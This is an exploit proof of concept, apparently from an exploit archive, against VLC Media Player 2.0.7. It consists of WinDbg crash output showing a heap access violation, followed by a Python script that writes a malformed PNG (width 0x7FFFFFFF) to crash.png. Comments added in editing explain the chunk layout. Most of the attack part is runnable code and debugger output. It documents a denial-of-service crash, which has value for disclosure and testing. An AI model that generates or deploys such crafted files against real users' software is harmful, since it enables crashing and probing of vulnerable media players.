
# Title : VLC Media Player 2.0.7 (.png) - Crash PoC
# Published : 2013-07-01
# Author :


#!/usr/bin/python

# VLC Media Player 2.0.7 PNG Crash PoC
# Vendor Homepage: http://www.videolan.org/
# Version: 2.0.7
# Tested on: Windows 7 64-bit
# Author: Kevin Fujimoto

# Debug Information:
# Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
# Copyright (c) Microsoft Corporation. All rights reserved.

# *** wait with pending attach
# Symbol search path is: SRV*g:\symbols*http://msdl.microsoft.com/download/symbols
# Executable search path is: 
# ModLoad: 00400000 00425000   G:Program Files (x86)VideoLANVLCvlc.exe
# ModLoad: 775b0000 77730000   C:WindowsSysWOW64ntdll.dll
# ModLoad: 750f0000 75200000   C:Windowssyswow64kernel32.dll
# ModLoad: 76100000 76147000   C:Windowssyswow64KERNELBASE.dll
# ModLoad: 623e0000 6240c000   G:Program Files (x86)VideoLANVLClibvlc.dll
# ModLoad: 50420000 5066d000   G:Program Files (x86)VideoLANVLClibvlccore.dll
# ModLoad: 75ab0000 75b50000   C:Windowssyswow64ADVAPI32.dll
# ModLoad: 76170000 7621c000   C:Windowssyswow64msvcrt.dll
# ModLoad: 76150000 76169000   C:WindowsSysWOW64sechost.dll
# ModLoad: 75210000 75300000   C:Windowssyswow64RPCRT4.dll
# ModLoad: 75000000 75060000   C:Windowssyswow64SspiCli.dll
# ModLoad: 74ff0000 74ffc000   C:Windowssyswow64CRYPTBASE.dll
# ModLoad: 76390000 76fda000   C:Windowssyswow64SHELL32.DLL
# ModLoad: 76230000 76287000   C:Windowssyswow64SHLWAPI.dll
# ModLoad: 75dd0000 75e60000   C:Windowssyswow64GDI32.dll
# ModLoad: 75ca0000 75da0000   C:Windowssyswow64USER32.dll
# ModLoad: 760f0000 760fa000   C:Windowssyswow64LPK.dll
# ModLoad: 75bf0000 75c8d000   C:Windowssyswow64USP10.dll
# ModLoad: 71880000 718b2000   C:Windowssystem32WINMM.DLL
# ModLoad: 75590000 755c5000   C:Windowssyswow64WS2_32.dll
# ModLoad: 75300000 75306000   C:Windowssyswow64NSI.dll
# ModLoad: 75730000 75735000   C:Windowssyswow64PSAPI.DLL
# ModLoad: 75750000 75908000   C:Windowssyswow64WININET.DLL
# ModLoad: 75be0000 75be4000   C:Windowssyswow64api-ms-win-downlevel-user32-l1-1-0.dll
# ModLoad: 77580000 77585000   C:Windowssyswow64api-ms-win-downlevel-advapi32-l1-1-0.dll
# ModLoad: 76220000 76224000   C:Windowssyswow64api-ms-win-downlevel-shlwapi-l1-1-0.dll
# ModLoad: 75c90000 75c94000   C:Windowssyswow64api-ms-win-downlevel-version-l1-1-0.dll
# ModLoad: 74df0000 74df9000   C:Windowssystem32version.DLL
# ModLoad: 75a40000 75a43000   C:Windowssyswow64api-ms-win-downlevel-normaliz-l1-1-0.dll
# ModLoad: 75740000 75743000   C:Windowssyswow64normaliz.DLL
# ModLoad: 75310000 75508000   C:Windowssyswow64iertutil.dll
# ModLoad: 75a50000 75ab0000   C:Windowssystem32IMM32.DLL
# ModLoad: 762c0000 7638c000   C:Windowssyswow64MSCTF.dll
# ModLoad: 10000000 10059000   C:WindowsSysWOW64guard32.dll
# ModLoad: 74de0000 74de7000   C:Windowssystem32fltlib.dll
# ModLoad: 755d0000 7572c000   C:Windowssyswow64ole32.dll
# ModLoad: 73d90000 73d9b000   C:Windowssystem32profapi.dll
# ModLoad: 720f0000 72170000   C:Windowssystem32uxtheme.dll
# ModLoad: 73cb0000 73cc3000   C:Windowssystem32dwmapi.dll
# ModLoad: 71f50000 720ee000   C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2comctl32.dll
# ModLoad: 75060000 750e3000   C:Windowssyswow64CLBCatQ.DLL
# ModLoad: 75b50000 75bdf000   C:Windowssyswow64OLEAUT32.dll
# ModLoad: 61070000 610bc000   G:Program Files (x86)VideoLANVLCpluginsaccesslibdshow_plugin.dll
# ModLoad: 5bf20000 5bf3c000   G:Program Files (x86)VideoLANVLCpluginsaudio_outputlibaout_directx_plugin.dll
# ModLoad: 5bf00000 5bf1d000   G:Program Files (x86)VideoLANVLCpluginsaudio_outputlibwaveout_plugin.dll
# ModLoad: 5b850000 5b874000   G:Program Files (x86)VideoLANVLCpluginsvideo_outputlibdirectx_plugin.dll
# ModLoad: 5b830000 5b849000   G:Program Files (x86)VideoLANVLCpluginsmmxextlibmemcpymmxext_plugin.dll
# ModLoad: 5b7f0000 5b82f000   G:Program Files (x86)VideoLANVLCpluginsaccessliblibbluray_plugin.dll
# ModLoad: 59020000 59048000   G:Program Files (x86)VideoLANVLCpluginsaccesslibaccess_bd_plugin.dll
# ModLoad: 57fb0000 58001000   G:Program Files (x86)VideoLANVLCpluginsaccesslibdvdnav_plugin.dll
# ModLoad: 5b7d0000 5b7eb000   G:Program Files (x86)VideoLANVLCpluginsaccesslibaccess_vdr_plugin.dll
# ModLoad: 5b760000 5b77b000   G:Program Files (x86)VideoLANVLCpluginsaccesslibfilesystem_plugin.dll
# ModLoad: 50830000 508ac000   G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_httplive_plugin.dll
# ModLoad: 50370000 50420000   G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_dash_plugin.dll
# ModLoad: 59060000 5907a000   G:Program Files (x86)VideoLANVLCpluginsaccesslibstream_filter_rar_plugin.dll
# ModLoad: 58040000 58065000   G:Program Files (x86)VideoLANVLCpluginsaccesslibzip_plugin.dll
# ModLoad: 58020000 58039000   G:Program Files (x86)VideoLANVLCpluginsstream_filterlibstream_filter_record_plugin.dll
# ModLoad: 57bb0000 57bda000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibplaylist_plugin.dll
# ModLoad: 50210000 5036f000   G:Program Files (x86)VideoLANVLCpluginsmeta_enginelibtaglib_plugin.dll
# ModLoad: 57b50000 57baa000   G:Program Files (x86)VideoLANVLCpluginslualiblua_plugin.dll
# ModLoad: 500c0000 50202000   G:Program Files (x86)VideoLANVLCpluginsmisclibxml_plugin.dll
# ModLoad: 57cd0000 57ced000   G:Program Files (x86)VideoLANVLCpluginscontrollibhotkeys_plugin.dll
# ModLoad: 57970000 57989000   G:Program Files (x86)VideoLANVLCpluginscontrollibglobalhotkeys_plugin.dll
# ModLoad: 68cf0000 697d9000   G:Program Files (x86)VideoLANVLCpluginsguilibqt4_plugin.dll
# ModLoad: 75510000 7558b000   C:Windowssyswow64COMDLG32.DLL
# ModLoad: 72230000 72281000   C:Windowssystem32WINSPOOL.DRV
# ModLoad: 72330000 72337000   C:Windowssystem32WSOCK32.DLL
# ModLoad: 73da0000 73db7000   C:Windowssystem32userenv.dll
# ModLoad: 72200000 72216000   C:Windowssystem32CRYPTSP.dll
# ModLoad: 72180000 721bb000   C:Windowssystem32rsaenh.dll
# ModLoad: 73a60000 73a6e000   C:Windowssystem32RpcRtRemote.dll
# ModLoad: 507d0000 50828000   G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibupnp_plugin.dll
# ModLoad: 72650000 7266c000   C:Windowssystem32IPHLPAPI.DLL
# ModLoad: 72640000 72647000   C:Windowssystem32WINNSI.DLL
# ModLoad: 57940000 57965000   G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibsap_plugin.dll
# ModLoad: 57160000 5717a000   G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibpodcast_plugin.dll
# ModLoad: 56d90000 56daa000   G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibmediadirs_plugin.dll
# ModLoad: 507b0000 507c9000   G:Program Files (x86)VideoLANVLCpluginsservices_discoverylibwindrive_plugin.dll
# ModLoad: 62da0000 62f0f000   C:Windowssystem32explorerframe.dll
# ModLoad: 62d70000 62d9f000   C:Windowssystem32DUser.dll
# ModLoad: 62cb0000 62d62000   C:Windowssystem32DUI70.dll
# ModLoad: 730c0000 73144000   C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149afcomctl32.dll
# ModLoad: 77c00000 77c40000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibmp4_plugin.dll
# ModLoad: 77bd0000 77bf5000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibavi_plugin.dll
# ModLoad: 77ba0000 77bc2000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibasf_plugin.dll
# ModLoad: 77b80000 77b9b000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibflacsys_plugin.dll
# ModLoad: 50790000 507ab000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibes_plugin.dll
# ModLoad: 69830000 69857000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibmpc_plugin.dll
# ModLoad: 61c90000 61cab000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibnuv_plugin.dll
# ModLoad: 6bbb0000 6bbca000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibtta_plugin.dll
# ModLoad: 675f0000 6760b000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibwav_plugin.dll
# ModLoad: 6aaf0000 6abdb000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibsid_plugin.dll
# ModLoad: 69d90000 69eb8000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibmkv_plugin.dll
# ModLoad: 6ccd0000 6cd86000   G:Program Files (x86)VideoLANVLCpluginsdemuxliblive555_plugin.dll
# ModLoad: 6ef10000 6ef3b000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibogg_plugin.dll
# ModLoad: 70950000 70969000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibdirac_plugin.dll
# ModLoad: 644f0000 6450a000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibsmf_plugin.dll
# ModLoad: 64370000 6438a000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibrawvid_plugin.dll
# ModLoad: 6c2c0000 6c2da000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibpva_plugin.dll
# ModLoad: 6a510000 6a53f000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibts_plugin.dll
# ModLoad: 67f30000 67f4a000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibnsv_plugin.dll
# ModLoad: 6f980000 6f999000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibau_plugin.dll
# ModLoad: 6a6e0000 6a74f000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibgme_plugin.dll
# ModLoad: 6c5e0000 6c5fa000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibvoc_plugin.dll
# ModLoad: 64810000 64829000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibxa_plugin.dll
# ModLoad: 071a0000 072ad000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibmod_plugin.dll
# ModLoad: 66c10000 66c2a000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibaiff_plugin.dll
# ModLoad: 060b0000 060cb000   G:Program Files (x86)VideoLANVLCpluginsdemuxlibimage_plugin.dll
# ModLoad: 77b40000 77b7e000   G:Program Files (x86)VideoLANVLCpluginscodeclibpng_plugin.dll
# (1e8c.1954): Access violation - code c0000005 (!!! second chance !!!)
# eax=072b0048 ebx=00ab0000 ecx=00000000 edx=00000000 esi=072b0040 edi=00ab0000
# eip=775eb6d8 esp=0658daf4 ebp=0658dbc4 iopl=0         nv up ei pl nz na po nc
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
# ntdll!RtlpAllocateHeap+0x7fb:
# 775eb6d8 8b09            mov     ecx,dword ptr [ecx]  ds:002b:00000000=????????
# 0:009> !exploitable -v
# HostMachineHostUser
# Executing Processor Architecture is x86
# Debuggee is in User Mode
# Debuggee is a live user mode debugging session on the local machine
# Event Type: Exception
# *** ERROR: Module load completed but symbols could not be loaded for G:\Program Files (x86)\VideoLAN\VLC\vlc.exe
# Exception Faulting Address: 0x0
# Second Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
# Exception Sub-Type: Read Access Violation

# Faulting Instruction:775eb6d8 mov ecx,dword ptr [ecx]

# Basic Block:
#     775eb6d8 mov ecx,dword ptr [ecx]
#        Tainted Input Operands: ecx
#     775eb6da mov edx,dword ptr [edx+4]
#     775eb6dd cmp ecx,edx
#        Tainted Input Operands: ecx
#     775eb6df jne ntdll!rtlpallocateheap+0x8e4 (7763af86)
#        Tainted Input Operands: ZeroFlag

# Exception Hash (Major/Minor): 0x65193219.0x71557302

# Stack Trace:
# ntdll!RtlpAllocateHeap+0x7fb
# ntdll!RtlAllocateHeap+0x23a
# msvcrt!_calloc_impl+0x136
# msvcrt!_calloc_crt+0x16
# msvcrt!_getbuf+0x11
# msvcrt!_flsbuf+0x94
# msvcrt!_fputwc_nolock+0xd5
# msvcrt!fputwc+0x51
# vlc+0x5975
# vlc+0x97ee
# vlc+0x700b
# msvcrt!_wsopen_s+0x1b
# msvcrt!_unlock+0x15
# msvcrt!_iob+0x60
# ntdll!ExecuteHandler2+0x26
# Instruction Address: 0x00000000775eb6d8

# Description: Data from Faulting Address controls Branch Selection
# Short Description: TaintedDataControlsBranchSelection
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection starting at ntdll!RtlpAllocateHeap+0x00000000000007fb called from msvcrt!_calloc_impl+0x0000000000000136 (Hash=0x65193219.0x71557302)

# The data from the faulting address is later used to determine whether or not a branch is taken.

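# Crafted PNG that the script writes to disk.
#
# The listing had lost the backslashes of its `\x` escapes, so as printed it
# would have written ASCII text such as "x89x50..." rather than the bytes the
# comments describe; the escapes are restored here and the literal is made a
# bytes literal so the same bytes are written under Python 2 and Python 3.
# Indentation inside the parentheses is normalised (the original mixed tabs
# and spaces).
#
# Layout: PNG signature, then IHDR / PLTE / tRNS / IDAT / IEND chunks, each
# as <4-byte length><4-byte type><data><4-byte CRC>.  The IHDR declares a
# width of 0x7FFFFFFF (2^31-1, the largest value the PNG spec permits) with a
# height of 0x102.  The debugger output above places the access violation
# inside the heap allocator under calloc; presumably the oversized dimensions
# feed an allocation-size computation in the image/PNG decode path, which is
# why a decoder should bound width*height before allocating (not confirmed
# from this page).  CRC fields carry the values given on the page and are
# not recomputed here.
out = (
    b"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A"  # PNG signature
    b"\x00\x00\x00\x0D"                  # IHDR length (13)
    b"\x49\x48\x44\x52"                  # "IHDR"
    b"\x7F\xFF\xFF\xFF"                  # width  = 0x7FFFFFFF
    b"\x00\x00\x01\x02"                  # height = 0x102
    b"\x01"                              # bit depth
    b"\x03"                              # color type (indexed)
    b"\x00"                              # compression method
    b"\x00"                              # filter method
    b"\x00"                              # interlace method
    b"\xBA\x1B\xD8\x84"                  # IHDR CRC (as given on the page)
    b"\x00\x00\x00\x03"                  # PLTE length (3)
    b"\x50\x4C\x54\x45"                  # "PLTE"
    b"\xFF"                              # red
    b"\xFF"                              # green
    b"\xFF"                              # blue
    b"\xA7\xC4\x1B\xC8"                  # PLTE CRC (as given on the page)
    b"\x00\x00\x00\x01"                  # tRNS length (1)
    b"\x74\x52\x4E\x53"                  # "tRNS"
    b"\x00"                              # alpha for palette entry 0
    b"\x40\xE6\xD8\x66"                  # tRNS CRC (as given on the page)
    b"\x00\x00\x00\x01"                  # IDAT length (1)
    b"\x49\x44\x41\x54"                  # "IDAT"
    b"\xFF"                              # image data (single byte)
    b"\x05\x3A\x92\x65"                  # IDAT CRC (as given on the page)
    b"\x00\x00\x00\x00"                  # IEND length (0)
    b"\x49\x45\x4E\x44"                  # "IEND"
    b"\xAE\x42\x60\x82"                  # IEND CRC
)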

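# Write the crafted PNG to crash.png in the current working directory.
# A context manager closes the handle even if the write raises, and the
# handle is no longer bound to the name `file`, which shadowed the Python 2
# builtin.  print() with a single argument behaves the same under Python 2
# (parenthesised expression) and Python 3.
print("Writing file...")

with open('crash.png', 'wb') as fh:
    fh.write(out)

print("File written!")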